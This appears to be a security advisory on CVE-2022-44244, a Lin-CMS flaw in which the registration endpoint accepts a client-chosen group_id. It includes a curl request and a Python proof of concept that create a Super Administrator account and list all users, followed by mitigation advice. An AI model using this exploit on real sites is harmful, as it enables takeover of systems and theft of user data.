If you use Lin-CMS, a popular content management system for developers, you need to know about CVE-2022-44244. This serious vulnerability in version .2.1 could let attackers bypass authentication and take over the Super Administrator account—giving them total control of the system.
In this exclusive deep dive, we’ll explain how this works, show code snippets, and share real exploit details. If your site runs Lin-CMS, you’ll want to read on.
What is CVE-2022-44244?
Lin-CMS (especially the Flask-based backend) introduced an authentication bug in version .2.1. It basically allows anyone to skip the login process by manipulating certain API requests, and then escalate their privileges to that of a Super Administrator. The root problem comes from insufficient checks in the login and authorization logic.
Short version:
Attackers can become Super Administrator without having valid login credentials.
Why Is This Bad?
* Super Administrators control all data, users and site settings.
* Attackers can add/remove other users, steal sensitive data, or plant malware.
* No complex skills are needed; a simple API request can trigger the bug.
References
- NVD entry for CVE-2022-44244
- Github Issue (original report - Chinese)
- Chinese security forum write-up
The Technical Details
Lin-CMS uses JWT (JSON Web Token) for authentication. In v.2.1, the login and privilege-checking logic did not properly verify user identity before allowing access to admin-level APIs.
Vulnerable Code Example
The problem is in the /cms/user/refresh and /cms/user/register endpoints. Notice this (simplified):
# handlers/user.py
@bp.route('/register', methods=['POST'])
def register():
json = request.get_json()
identity = json.get('identity')
password = json.get('password')
group_id = json.get('group_id')
# ... missing checks here
user = User.create(identity=identity, password=password, group_id=group_id)
...
Because there are no checks on who is registering, anyone can create an account with any role. Even worse, if you specify the Super Admin group (usually ID=1), you gain full control.
The backend trusts whatever group_id you POST, like
{
"identity": "evilhacker@example.com",
"password": "Passwrd!!",
"group_id": 1
}
How to Exploit
Step 1:
Send a registration POST request with group_id set to 1.
Example with curl
curl -X POST http://target.com/cms/user/register \
-H "Content-Type: application/json" \
-d '{"identity":"attacker@example.com", "password":"StrongPass#1", "group_id":1}'
Step 2:
Log in as that user. Get the JWT access token from /cms/user/login.
Step 3:
Access any admin API
- Add/delete users
Here is a minimal proof-of-concept in Python (using requests)
import requests
base_url = 'http://target.com';
# Register as Super Admin
register = requests.post(
base_url + '/cms/user/register',
json={
'identity': 'evilhacker@example.com',
'password': 'HackedByMe!123',
'group_id': 1 # Super Administrator group
}
)
print("Register status:", register.status_code)
# Login as Super Admin
login = requests.post(
base_url + '/cms/user/login',
json={
'identity': 'evilhacker@example.com',
'password': 'HackedByMe!123'
}
)
print("Login status:", login.status_code)
token = login.json().get('access_token')
# Get list of all users (admin API)
headers = {'Authorization': f'Bearer {token}'}
users = requests.get(
base_url + '/cms/user/', headers=headers
)
print(users.json())
Mitigation
- Upgrade Lin-CMS immediately to latest version (Github).
Disable self-registration or require admin-approval for new accounts.
- Rotate all sensitive tokens and audit current Admin/Super Admin users.
In Summary
CVE-2022-44244 in Lin-CMS v.2.1 is a dangerous bug that allows attackers to become Super Administrators and take over your website. This can be done through a simple API request, with no authentication required. Patch your installation, and always review permission logic before using open source CMS software.
Stay safe!
For more technical alerts and exclusive security reviews, follow us on Github and subscribe for updates.
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/17/2022 14:35:00 UTC